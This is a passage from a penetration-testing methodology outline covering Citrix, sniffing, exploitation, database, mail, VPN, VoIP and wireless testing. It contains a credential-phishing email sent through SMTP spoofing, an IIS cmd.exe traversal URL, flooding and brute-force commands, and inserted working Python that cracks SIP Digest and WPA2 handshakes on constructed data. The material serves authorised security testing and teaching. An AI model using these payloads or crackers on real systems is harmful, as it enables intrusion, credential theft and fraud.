20.4.3.5.3. Shift + Left Click – New Browser

20.4.3.5.4. Ctrl + o – Internet Address (browse feature)

20.4.3.5.5. Ctrl + p – Print (to file)

20.4.3.5.6. Right Click (Shift + F10)

20.4.3.5.7. F1 – Jump to URL

20.4.3.5.8. SHIFT+F1: Local Task List

20.4.3.5.9. SHIFT+F2: Toggle Title Bar

20.4.3.5.10. SHIFT+F3: Close Remote Application

20.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

20.4.3.5.12. CTRL+F2: Remote Task List

20.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

20.4.3.5.14. ALT+F2: Cycle through programs

20.4.3.5.15. ALT+PLUS: Alt+TAB

20.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB

20.5. Brute Force

20.5.1. bforce.js

20.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

20.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

20.5.1.3. Untitled

20.6. Review Configuration Files

20.6.1. Application server configuration file

20.6.1.1. appsrv.ini

20.6.1.1.1. Location

20.6.1.1.2. World writeable

20.6.1.1.3. Review other files

20.6.1.1.4. Sample file

20.6.2. Program Neighborhood configuration file

20.6.2.1. pn.ini

20.6.2.1.1. Location

20.6.2.1.2. Review other files

20.6.2.1.3. Sample file

20.6.3. Citrix ICA client configuration file

20.6.3.1. wfclient.ini

20.6.3.1.1. Location

20.7. References

20.7.1. Vulnerabilities

20.7.1.1. Art of Hacking

20.7.1.2. Common Vulnerabilities and Exploits (CVE)

20.7.1.2.1. Sample file

20.7.1.2.2. Untitled

20.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

20.7.1.3. OSVDB

20.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia

20.7.1.4. Secunia

20.7.1.5. Security-database.com

20.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

20.7.1.6. SecurityFocus

20.7.2. Support

20.7.2.1. Citrix

20.7.2.1.1. Knowledge Base

20.7.2.2. Thinworld

20.7.3. Exploits

20.7.3.1. Milw0rm

20.7.3.1.1. http://www.milw0rm.com/search.php

20.7.3.2. Art of Hacking

20.7.3.2.1. Citrix

20.7.4. Tools Resource

20.7.4.1. Zip file containing the majority of the tools mentioned in this article, for easy download/ access

21. Network Backbone

21.1. Generic Toolset

21.1.1. Wireshark (Formerly Ethereal)

21.1.1.1. Passive Sniffing

21.1.1.1.1. Usernames/Passwords

21.1.1.1.2. Email

21.1.1.1.3. FTP

21.1.1.1.4. HTTP

21.1.1.1.5. HTTPS

21.1.1.1.6. RDP

21.1.1.1.7. VOIP

21.1.1.1.8. Other

21.1.1.2. Filters

21.1.1.2.1. ip.src == ip_address

21.1.1.2.2. ip.dst == ip_address

21.1.1.2.3. tcp.dstport == port_no.

21.1.1.2.4. ! ip.addr == ip_address

21.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

21.1.2. Cain & Abel

21.1.2.1. Active Sniffing

21.1.2.1.1. ARP Cache Poisoning

21.1.2.1.2. DNS Poisoning

21.1.2.1.3. Routing Protocols

21.1.3. Cisco-Torch

21.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

21.1.4. NTP-Fingerprint

21.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

21.1.5. Yersinia

21.1.6. p0f

21.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

21.1.7. Manual Check (Credentials required)

21.1.8. MAC Spoofing

21.1.8.1. mac address changer for windows

21.1.8.2. macchanger

21.1.8.2.1. Random Mac Address:- macchanger -r eth0

21.1.8.3. madmacs

21.1.8.4. smac

21.1.8.5. TMAC

22. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

22.1. Password Attacks

22.1.1. Known Accounts

22.1.1.1. Identified Passwords

22.1.1.2. Unidentified Hashes

22.1.2. Default Accounts

22.1.2.1. Identified Passwords

22.1.2.2. Unidentified Hashes

22.2. Exploits

22.2.1. Successful Exploits

22.2.1.1. Accounts

22.2.1.1.1. Passwords

22.2.1.1.2. Groups

22.2.1.1.3. Other Details

22.2.1.2. Services

22.2.1.3. Backdoor

22.2.1.4. Connectivity

22.2.2. Unsuccessful Exploits

22.2.3. Resources

22.2.3.1. Securiteam

22.2.3.1.1. Exploits are sorted by year and must be downloaded individually

22.2.3.2. SecurityForest

22.2.3.2.1. Updated via CVS after initial install

22.2.3.3. GovernmentSecurity

22.2.3.3.1. Need to create an account to obtain access

22.2.3.4. Red Base Security

22.2.3.4.1. Oracle Exploit site only

22.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

22.2.3.5.1. Wireless Exploit Site

22.2.3.6. PacketStorm Security

22.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

22.2.3.7. SecWatch

22.2.3.7.1. Exploits sorted by year and month, downloaded separately

22.2.3.8. SecurityFocus

22.2.3.8.1. Exploits must be downloaded individually

22.2.3.9. Metasploit

22.2.3.9.1. Install and regularly update via svn

22.2.3.10. Milw0rm

22.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!

22.3. Tools

22.3.1. Metasploit

22.3.1.1. Free Extra Modules

22.3.1.1.1. local copy

22.3.2. Manual SQL Injection

22.3.2.1. Understanding SQL Injection

22.3.2.2. SQL Injection walkthrough

22.3.2.3. SQL Injection by example

22.3.2.4. Blind SQL Injection

22.3.2.5. Advanced SQL Injection in SQL Server

22.3.2.6. More Advanced SQL Injection

22.3.2.7. Advanced SQL Injection in Oracle databases

22.3.2.8. SQL Cheatsheets

22.3.2.8.1. Untitled

22.3.3. SQL Power Injector

22.3.4. SecurityForest

22.3.5. SPI Dynamics WebInspect

22.3.6. Core Impact

22.3.7. Cisco Global Exploiter

22.3.8. PIXDos

22.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]

22.3.9. CANVAS

22.3.10. Inguma

23. Server Specific Tests

23.1. Databases

23.1.1. Direct Access Interrogation

23.1.1.1. MS SQL Server

23.1.1.1.1. Ports

23.1.1.1.2. Version

23.1.1.1.3. osql

23.1.1.2. Oracle

23.1.1.2.1. Ports

23.1.1.2.2. TNS Listener

23.1.1.2.3. SQL Plus

23.1.1.2.4. Default Account/Passwords

23.1.1.2.5. Default SID's

23.1.1.3. MySQL

23.1.1.3.1. Ports

23.1.1.3.2. Version

23.1.1.3.3. Users/Passwords

23.1.1.4. DB2

23.1.1.5. Informix

23.1.1.6. Sybase

23.1.1.7. Other

23.1.2. Scans

23.1.2.1. Default Ports

23.1.2.2. Non-Default Ports

23.1.2.3. Instance Names

23.1.2.4. Versions

23.1.3. Password Attacks

23.1.3.1. Sniffed Passwords

23.1.3.1.1. Cracked Passwords

23.1.3.1.2. Hashes

23.1.3.2. Direct Access Guesses

23.1.4. Vulnerability Assessment

23.1.4.1. Automated

23.1.4.1.1. Reports

23.1.4.1.2. Vulnerabilities

23.1.4.2. Manual

23.1.4.2.1. Patch Levels

23.1.4.2.2. Confirmed Vulnerabilities

23.2. Mail

23.2.1. Scans

23.2.2. Fingerprint

23.2.2.1. Manual

23.2.2.2. Automated

23.2.3. Spoofable

23.2.3.1. Telnet spoof

23.2.3.1.1. telnet target_IP 25
helo target.com
mail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]
X-Originating-Email: [[email protected]]
MIME-Version: 1.0
To: <[email protected]>
From: < [email protected] >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit

Dear Valued Customer,
The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.
Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>
Online Security Manager.
Target [email protected].

23.2.4. Relays

23.3. VPN

23.3.1. Scanning

23.3.1.1. 500 UDP IPSEC

23.3.1.2. 1723 TCP PPTP

23.3.1.3. 443 TCP/SSL

23.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

23.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

23.3.2. Fingerprinting

23.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

23.3.3. PSK Crack

23.3.3.1. ikeprobe 80.75.68.27

23.3.3.2. sniff for responses with Cain & Abel or ikecrack

23.4. Web

23.4.1. Vulnerability Assessment

23.4.1.1. Automated

23.4.1.1.1. Reports

23.4.1.1.2. Vulnerabilities

23.4.1.2. Manual

23.4.1.2.1. Patch Levels

23.4.1.2.2. Confirmed Vulnerabilities

23.4.2. Permissions

23.4.2.1. PUT /test.txt HTTP/1.0

23.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

23.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
Content-Type: text/plain
Content-Length: 6

23.4.3. Scans

23.4.4. Fingerprinting

23.4.4.1. Other

23.4.4.2. HTTP

23.4.4.2.1. Commands

23.4.4.2.2. Modules

23.4.4.2.3. File Extensions

23.4.4.3. HTTPS

23.4.4.3.1. Commands

23.4.4.3.2. Modules

23.4.4.3.3. File Extensions

23.4.5. Directory Traversal

23.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
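
Why the doubled encoding in that URL matters, as an added example (a model written for this page, not IIS code and not from the framework): the server decoded the path once, checked that it stayed inside the virtual directory, then decoded it a second time while building the filesystem path. After one decode, %255c is %5c, which the check does not treat as a separator; the second decode turns it into a backslash and the traversal happens unchecked. The single-encoded %5c form is caught, which is exactly why the request needs %255c. The virtual-directory layout is assumed. The hardened mapper decodes until the string is stable, refuses anything still escaped, and does nothing further to the path after the check.

```python
"""Model of the IIS double-decoding traversal (the "..%255c.." request above).

Added example, not part of the Penetration Testing Framework outline and not
IIS code: two small path mappers, one reproducing the flawed order of
operations and one doing it safely. The virtual-directory layout is assumed.
"""
import posixpath
from urllib.parse import unquote

# Assumed layout: the /scripts virtual directory maps to its own folder and a
# request under it must resolve to a file inside that folder.
VDIRS = {"/scripts": "/inetpub/scripts"}

ATTACK = "http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\\"
SINGLE = "http://www.target.com/scripts/..%5c../winnt/system32/cmd.exe?/c+dir+c:\\"
BENIGN = "http://www.target.com/scripts/tools/status.asp?view=all"


def url_path(url):
    """Drop scheme, host and query string; keep the path exactly as sent (still escaped)."""
    rest = url.partition("://")[2]
    path = "/" + rest.partition("/")[2]
    return path.partition("?")[0]


def fs_candidate(decoded_path):
    """Map a decoded path onto its virtual directory, treating backslash as a
    separator (IIS does) and collapsing '.' and '..'.
    Returns (root, candidate) or (None, None) when no virtual directory matches."""
    for prefix, root in VDIRS.items():
        if decoded_path.lower().startswith(prefix + "/"):
            rest = decoded_path[len(prefix):].replace("\\", "/")
            return root, posixpath.normpath(root + rest)
    return None, None


def within(root, candidate):
    return candidate == root or candidate.startswith(root + "/")


def vulnerable_map(url):
    """Flawed order: decode once, check, then decode again while building the path."""
    once = unquote(url_path(url))                 # "%255c" -> "%5c": not a separator yet
    root, candidate = fs_candidate(once)
    if root is None or not within(root, candidate):
        return None                               # the traversal check runs here ...
    twice = unquote(once)                         # ... but the path is decoded once more
    return fs_candidate(twice)[1]                 # and the new result is used unchecked


def hardened_map(url):
    """Decode until stable, reject anything still escaped, normalise, check, and
    do nothing further to the string after the check."""
    decoded = url_path(url)
    for _ in range(3):                            # bounded: longer "%2525..." chains stop here
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    if "%" in decoded or "\x00" in decoded:       # still-escaped bytes or a NUL: refuse
        return None
    root, candidate = fs_candidate(decoded)
    if root is None or not within(root, candidate):
        return None
    return candidate


if __name__ == "__main__":
    for name, url in (("attack", ATTACK), ("single", SINGLE), ("benign", BENIGN)):
        print(f"{name:7} vulnerable -> {vulnerable_map(url)}")
        print(f"{name:7} hardened   -> {hardened_map(url)}")
```

The general lesson is the ordering: canonicalise completely first, then check, then use the checked value unchanged. Any decode, case-fold or separator translation that happens after the check reopens the hole.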

24. VoIP Security

24.1. Sniffing Tools

24.1.1. AuthTool

24.1.2. Cain & Abel

24.1.3. Etherpeek

24.1.4. NetDude

24.1.5. Oreka

24.1.6. PSIPDump

24.1.7. SIPomatic

24.1.8. SIPv6 Analyzer

24.1.9. UCSniff

24.1.10. VoiPong

24.1.11. VOMIT

24.1.12. Wireshark

24.1.13. WIST - Web Interface for SIP Trace

24.2. Scanning and Enumeration Tools

24.2.1. enumIAX

24.2.2. fping

24.2.3. IAX Enumerator

24.2.4. iWar

24.2.5. Nessus

24.2.6. Nmap

24.2.7. SIP Forum Test Framework (SFTF)

24.2.8. SIPcrack

24.2.9. sipflanker

24.2.9.1. python sipflanker.py 192.168.1-254

24.2.10. SIP-Scan

24.2.11. SIP.Tastic

24.2.12. SIPVicious

24.2.13. SiVuS

24.2.14. SMAP

24.2.14.1. smap IP_Address/Subnet_Mask

24.2.14.2. smap -o IP_Address/Subnet_Mask

24.2.14.3. smap -l IP_Address

24.2.15. snmpwalk

24.2.16. VLANping

24.2.17. VoIPAudit

24.2.18. VoIP GHDB Entries

24.2.19. VoIP Voicemail Database

24.3. Packet Creation and Flooding Tools

24.3.1. H.323 Injection Files

24.3.2. H225regreject

24.3.3. IAXHangup

24.3.4. IAXAuthJack

24.3.5. IAX.Brute

24.3.6. IAXFlooder

24.3.6.1. ./iaxflood sourcename destinationname numpackets

24.3.7. INVITE Flooder

24.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

24.3.8. kphone-ddos

24.3.9. RTP Flooder

24.3.10. rtpbreak

24.3.11. Scapy

24.3.12. Seagull

24.3.13. SIPBomber

24.3.14. SIPNess

24.3.15. SIPp

24.3.16. SIPsak

24.3.16.1. Tracing paths: sipsak -T -s sip:username@domain

24.3.16.2. Options request: sipsak -vv -s sip:username@domain

24.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain

24.3.17. SIP-Send-Fun

24.3.18. SIPVicious

24.3.19. Spitter

24.3.20. TFTP Brute Force

24.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

24.3.21. UDP Flooder

24.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

24.3.22. UDP Flooder (with VLAN Support)

24.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

24.3.23. Voiphopper

24.4. Fuzzing Tools

24.4.1. Asteroid

24.4.2. Codenomicon VoIP Fuzzers

24.4.3. Fuzzy Packet

24.4.4. Mu Security VoIP Fuzzing Platform

24.4.5. ohrwurm RTP Fuzzer

24.4.6. PROTOS H.323 Fuzzer

24.4.7. PROTOS SIP Fuzzer

24.4.8. SIP Forum Test Framework (SFTF)

24.4.9. Sip-Proxy

24.4.10. Spirent ThreatEx

24.5. Signaling Manipulation Tools

24.5.1. AuthTool

24.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
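
What AuthTool (and SIPcrack, listed under Scanning and Enumeration) do with a sniffed REGISTER, as an added example written for this page and not either tool's code: SIP reuses HTTP Digest authentication (RFC 2617 MD5), so the response in the Authorization header can be recomputed for each candidate password from the username, realm, nonce, method and URI, all of which are in the capture. The REGISTER below is constructed, with its response computed from a known password, so the script runs offline; addresses, realm and nonce are made up.

```python
"""Offline dictionary attack on SIP Digest authentication (RFC 3261 reuses the
RFC 2617 MD5 scheme): what AuthTool and SIPcrack do with a sniffed REGISTER.

Added example, not part of the Penetration Testing Framework outline. The
captured REGISTER below is constructed (its response is computed from a known
password) so the script runs offline; addresses, realm and nonce are made up.
"""
import hashlib
import re


def _md5(*parts):
    return hashlib.md5(":".join(parts).encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """RFC 2617 response = MD5(HA1:nonce[:nc:cnonce:qop]:HA2)."""
    ha1 = _md5(username, realm, password)
    ha2 = _md5(method, uri)
    if qop is None:
        return _md5(ha1, nonce, ha2)
    return _md5(ha1, nonce, nc, cnonce, qop, ha2)


def parse_authorization(header):
    """'Authorization: Digest a="b", c=d' -> {'a': 'b', 'c': 'd'}."""
    params = header.partition("Digest")[2]
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in re.finditer(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', params)}


def crack_sip_digest(method, auth_header, wordlist):
    """Recompute the response for each candidate; the capture is never replayed."""
    p = parse_authorization(auth_header)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate, method, p["uri"],
                                p["nonce"], p.get("qop"), p.get("nc"), p.get("cnonce"))
        if guess == p["response"].lower():
            return candidate
    return None


def crack_from_capture(sip_message, wordlist):
    """Take the method from the request line and the Authorization header from a raw SIP request."""
    request_line, *headers = sip_message.split("\r\n")
    method = request_line.split(" ", 1)[0]
    auth = next(h for h in headers if h.lower().startswith("authorization:"))
    return crack_sip_digest(method, auth, wordlist)


def constructed_register(password="1234"):
    """The REGISTER a phone sends after a 401 challenge (constructed capture)."""
    username, realm, uri, nonce = "100", "asterisk", "sip:192.168.1.10", "5f1c0e2a"
    response = digest_response(username, realm, password, "REGISTER", uri, nonce)
    return "\r\n".join([
        f"REGISTER {uri} SIP/2.0",
        "Via: SIP/2.0/UDP 192.168.1.50:5060;branch=z9hG4bK776asdhds",
        f"From: <sip:{username}@192.168.1.10>;tag=1928301774",
        f"To: <sip:{username}@192.168.1.10>",
        "Call-ID: a84b4c76e66710@192.168.1.50",
        "CSeq: 2 REGISTER",
        f'Authorization: Digest username="{username}", realm="{realm}", nonce="{nonce}", '
        f'uri="{uri}", response="{response}", algorithm=MD5',
        "Content-Length: 0", "", ""])


# Constructed list; handsets are commonly provisioned with the extension or a short PIN.
WORDLIST = ["0000", "1111", "100", "1234", "secret"]

if __name__ == "__main__":
    print("recovered password:", crack_from_capture(constructed_register(), WORDLIST))
```

The digest protects the password from direct disclosure, not from this: one MD5 per guess over a short, unsalted input is cheap, and the nonce only prevents replay, so the defence is strong credentials and TLS (SIPS) on the signalling path rather than reliance on the digest itself.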

24.5.2. BYE Teardown

24.5.3. Check Sync Phone Rebooter

24.5.4. RedirectPoison

24.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

24.5.5. Registration Adder

24.5.6. Registration Eraser

24.5.7. Registration Hijacker

24.5.8. SIP-Kill

24.5.9. SIP-Proxy-Kill

24.5.10. SIP-RedirectRTP

24.5.11. SipRogue

24.5.12. vnak

24.6. Media Manipulation Tools

24.6.1. RTP InsertSound

24.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

24.6.2. RTP MixSound

24.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

24.6.3. RTPProxy

24.6.4. RTPInject

24.7. Generic Software Suites

24.7.1. OAT (Office Communications Server Assessment Tool)

24.7.2. EnableSecurity VOIPPACK

24.7.2.1. Note: add-on for Immunity CANVAS

24.8. References

24.8.1. URLs

24.8.1.1. Common Vulnerabilities and Exposures (CVE)

24.8.1.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

24.8.1.2. Default Passwords

24.8.1.3. Hacking Exposed VoIP

24.8.1.3.1. Tool Pre-requisites

24.8.1.4. VoIPsa

24.8.2. White Papers

24.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

24.8.2.2. An Analysis of VoIP Security Threats and Tools

24.8.2.3. Hacking VoIP Exposed

24.8.2.4. Security testing of SIP implementations

24.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

24.8.2.6. Two attacks against VoIP

24.8.2.7. VoIP Attacks!

24.8.2.8. VoIP Security Audit Program (VSAP)

25. Wireless Penetration

25.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out a wireless assessment. All of it is needed to give the tester, and hence the customer, a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.

25.1.1. Site Map

25.1.1.1. RF Map

25.1.1.1.1. Lines of Sight

25.1.1.1.2. Signal Coverage

25.1.1.2. Physical Map

25.1.1.2.1. Triangulate APs

25.1.1.2.2. Satellite Imagery

25.1.2. Network Map

25.1.2.1. MAC Filter

25.1.2.1.1. Authorised MAC Addresses

25.1.2.1.2. Reaction to Spoofed MAC Addresses

25.1.2.2. Encryption Keys utilised

25.1.2.2.1. WEP

25.1.2.2.2. WPA/PSK

25.1.2.2.3. 802.1x

25.1.2.3. Access Points

25.1.2.3.1. ESSID

25.1.2.3.2. BSSIDs

25.1.2.4. Wireless Clients

25.1.2.4.1. MAC Addresses

25.1.2.4.2. Intercepted Traffic

25.2. Wireless Toolkit

25.2.1. Wireless Discovery

25.2.1.1. Aerosol

25.2.1.2. Airfart

25.2.1.3. Aphopper

25.2.1.4. Apradar

25.2.1.5. BAFFLE

25.2.1.6. inSSIDer

25.2.1.7. iWEPPro

25.2.1.8. karma

25.2.1.9. KisMAC-ng

25.2.1.10. Kismet

25.2.1.11. MiniStumbler

25.2.1.12. Netstumbler

25.2.1.13. Vistumbler

25.2.1.14. Wellenreiter

25.2.1.15. Wifi Hopper

25.2.1.16. WirelessMon

25.2.1.17. WiFiFoFum

25.2.2. Packet Capture

25.2.2.1. Airopeek

25.2.2.2. Airpcap

25.2.2.3. Airtraf

25.2.2.4. Apsniff

25.2.2.5. Cain

25.2.2.6. Commview

25.2.2.7. Ettercap

25.2.2.8. Netmon

25.2.2.8.1. nmwifi

25.2.2.9. Wireshark

25.2.3. EAP Attack tools

25.2.3.1. eapmd5pass

25.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

25.2.4. Leap Attack Tools

25.2.4.1. asleap

25.2.4.2. thc leap cracker

25.2.4.3. anwrap

25.2.5. WEP/ WPA Password Attack Tools

25.2.5.1. Airbase

25.2.5.2. Aircrack-ptw

25.2.5.3. Aircrack-ng

25.2.5.4. Airsnort

25.2.5.5. cowpatty

25.2.5.6. FiOS Wireless Key Calculator

25.2.5.7. iWifiHack

25.2.5.8. KisMAC-ng

25.2.5.9. Rainbow Tables

25.2.5.10. wep attack

25.2.5.11. wep crack

25.2.5.12. wzcook

25.2.6. Frame Generation Software

25.2.6.1. Airgobbler

25.2.6.2. airpwn

25.2.6.3. Airsnarf

25.2.6.4. Commview

25.2.6.5. fake ap

25.2.6.6. void 11

25.2.6.7. wifi tap

25.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

25.2.6.8. FreeRADIUS - Wireless Pwnage Edition

25.2.7. Mapping Software

25.2.7.1. Online Mapping

25.2.7.1.1. WIGLE

25.2.7.1.2. Skyhook

25.2.7.2. Tools

25.2.7.2.1. Knsgem

25.2.8. File Format Conversion Tools

25.2.8.1. ns1 recovery and conversion tool

25.2.8.2. warbable

25.2.8.3. warkizniz

25.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

25.2.8.4. ivstools

25.2.9. IDS Tools

25.2.9.1. WIDZ

25.2.9.2. War Scanner

25.2.9.3. Snort-Wireless

25.2.9.4. AirDefense

25.2.9.5. AirMagnet

25.3. WLAN discovery

25.3.1. Unencrypted WLAN

25.3.1.1. Visible SSID

25.3.1.1.1. Sniff for IP range

25.3.1.2. Hidden SSID

25.3.1.2.1. Deauth client

25.3.2. WEP encrypted WLAN

25.3.2.1. Visible SSID

25.3.2.1.1. WEPattack

25.3.2.2. Hidden SSID

25.3.2.2.1. Deauth client

25.3.3. WPA / WPA2 encrypted WLAN

25.3.3.1. Deauth client

25.3.3.1.1. Capture EAPOL handshake
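
Once the EAPOL handshake is captured, the offline check that cowpatty and aircrack-ng run is the one below, as an added example written for this page rather than code from those tools or from the framework: derive the PMK from the candidate passphrase and the SSID with PBKDF2, expand it to the PTK with the two MAC addresses and the two nonces, and compare the MIC that the first 16 bytes of the PTK produce over message 2 with the MIC in the capture. The handshake here is constructed (SSID, MACs and nonces are made up and the MIC is computed from a known passphrase) so that it runs without a capture.

```python
"""Verifying a WPA/WPA2-PSK 4-way handshake offline: the check cowpatty and
aircrack-ng run once a 'Deauth client / Capture EAPOL handshake' has succeeded.

Added example, not part of the Penetration Testing Framework outline. The
handshake is constructed in this script (MIC computed from a known passphrase)
so that it runs without a capture; SSID, MACs and nonces are made up.
"""
import hashlib
import hmac

# EAPOL hdr (4) + descriptor type (1) + key info (2) + key len (2) + replay (8)
# + nonce (32) + IV (16) + RSC (8) + ID (8) = 81; the MIC field is the next 16 bytes
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """IEEE 802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs, min/max of nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP (key descriptor version 2): HMAC-SHA1 over the EAPOL-Key frame
    with the MIC field zeroed, truncated to 16 bytes. WPA/TKIP uses HMAC-MD5."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce, mic=b"\x00" * 16):
    """Minimal EAPOL-Key message 2 of 4 (constructed; empty key data)."""
    body = (b"\x02"                     # descriptor type: RSN
            + b"\x01\x0a"               # key info: pairwise | MIC | version 2 (HMAC-SHA1)
            + b"\x00\x10"               # key length 16
            + (1).to_bytes(8, "big")    # replay counter
            + snonce                    # 32-byte SNonce
            + b"\x00" * 16              # key IV
            + b"\x00" * 8               # key RSC
            + b"\x00" * 8               # key ID
            + mic
            + b"\x00\x00")              # key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key


def crack(handshake, wordlist):
    """Return the passphrase whose KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])
        kck = ptk[:16]                  # first 128 bits of the PTK authenticate the EAPOL frames
        if hmac.compare_digest(eapol_mic(kck, handshake["msg2"]), handshake["mic"]):
            return candidate
    return None


def constructed_handshake(passphrase="dictionary1", ssid="CorpWiFi"):
    """Fabricate what a capture would contain by running the real derivation."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))   # fixed, not random
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_msg2(snonce))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "msg2": build_msg2(snonce, mic), "mic": mic}


WORDLIST = ["password", "letmein", "CorpWiFi2009", "dictionary1", "Summer08"]  # constructed

if __name__ == "__main__":
    print("recovered PSK:", crack(constructed_handshake(), WORDLIST))
```

PBKDF2 at 4096 iterations is what makes each guess expensive, and the PMK depends only on passphrase and SSID, not on the handshake. That is why the 'Rainbow Tables' entry in the toolkit (precomputed PMKs per SSID, as cowpatty's genpmk produces) speeds this up for common SSIDs, and why a non-default SSID forces the attacker back to the full cost per guess.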

25.3.4. LEAP encrypted WLAN

25.3.4.1. Deauth client

25.3.4.1.1. Break LEAP

25.3.5. 802.1x WLAN

25.3.5.1. Create Rogue Access Point

25.3.5.1.1. Airsnarf

25.3.5.1.2. fake ap

25.3.5.1.3. Hotspotter

25.3.5.1.4. Karma

25.3.5.1.5. Linux rogue AP

25.3.6. Resources

25.3.6.1. URLs

25.3.6.1.1. Wirelessdefence.org

25.3.6.1.2. Russix

25.3.6.1.3. Wardrive.net

25.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

25.3.6.2. White Papers

25.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

25.3.6.2.2. 802.11b Firmware-Level Attacks

25.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

25.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

25.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds

